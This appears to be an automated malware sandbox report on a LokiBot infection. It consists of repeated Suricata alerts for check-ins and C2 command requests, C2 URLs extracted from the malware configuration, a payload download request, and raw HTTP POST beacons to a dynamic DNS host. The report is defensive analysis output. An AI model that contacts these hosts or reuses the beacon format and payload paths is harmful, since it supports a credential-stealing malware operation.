Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64428 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64445
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64443 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64443
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64361
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64373 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64441 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64375
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64386
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64358 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64358
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64427 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64427
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64385
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64397 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64434 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64441
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64397
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64355
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49713
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64440
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64434
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64438
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64370
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64446
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64447
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64383
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64411
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64428
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64359
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64399
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64439
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64413 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64401
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64373
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64419
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64418
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64378
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64381
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64414
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64448
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64429 -> 45.149.241.169:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php

Uses dynamic DNS services

Source: unknown

DNS query: name: freighteighttwocam.ddns.net

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UUNETUS UUNETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
